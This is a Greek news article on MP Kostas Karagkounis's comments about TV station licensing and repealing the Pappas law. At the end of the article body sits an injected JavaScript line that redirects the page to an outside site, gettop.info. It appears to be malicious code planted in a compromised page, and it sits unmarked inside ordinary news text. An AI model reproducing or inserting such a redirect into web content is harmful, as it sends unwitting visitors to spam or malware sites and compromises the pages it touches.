Καραγκούνης για τηλεοπτικούς σταθμούς: Να ανοίξουν όσοι θέλουν και όσοι μπορούν

0
16

 

Η αγορά είναι αυτή που θα καθορίσει τον αριθμό των εργαζομένων σε κάθε τηλεοπτικό σταθμό και επειδή η Νέα Δημοκρατία πιστεύει στην ελεύθερη αγορά, γι αυτό δεν έβαλε κατώτατο όριο στον αριθμό εργαζομένων που πρέπει να απασχολεί ένας τηλεοπτικός σταθμός για να πάρει άδεια, στο σχέδιο πρότασης νόμου, που έδωσε στη δημοσιότητα, τόνισε ο βουλευτής Κώστας Καραγκούνης στο ραδιόφωνο του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων «Πρακτορείο 104,9 FM», ενώ για τον αριθμό των καναλιών τάχθηκε με την άποψη «να ανοίξουν όσοι θέλουν και όσοι μπορούν».

«Εμείς πιστεύουμε στην ελεύθερη αγορά που βεβαίως πρέπει να έχει εγγυήσεις. Βεβαίως και δεν έχει η πρόταση μας συγκεκριμένο αριθμό. Πώς θα μπορούσε να έχει σε μια ελεύθερη αγορά; Να ανοίξουν όσοι θέλουν και όσοι μπορούν» είπε ο βουλευτής.

Ο κ. Καραγκούνης κατήγγειλε την κυβέρνηση ότι «έχει μπει σε έναν τεράστιο φαύλο κύκλο παλινωδιών και με τη γραμμή που ακολούθησε οδηγήθηκε σε έναν διαγωνισμό-παρωδία».

Σε ό,τι αφορά τη συγκρότηση του ΕΣΡ, δήλωσε πως η κυβέρνηση πρέπει να καταλάβει πως για να γίνει εφικτή, πρέπει προηγουμένως να καταργηθεί ολόκληρος ο νόμος Παππά και να συμφωνήσουν σε ένα νέο νομοθετικό πλαίσιο. «Ο νόμος Παππά πρέπει να καταργηθεί, να παρθεί πίσω και να συμφωνήσουμε σε ένα νέο νομοθετικό πλαίσιο. Δεν είναι μόνο το ζήτημα της αντισυνταγματικότητας του άρθρου 2Α, στο οποίο έμεινε η απόφαση του Συμβουλίου της Επικρατείας. Είναι και όλα τα υπόλοιπα ζητήματα, όπως ο αριθμός των αδειών, ο περιορισμός δηλαδή των αδειών» επεσήμανε ο κ. Καραγκούνης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here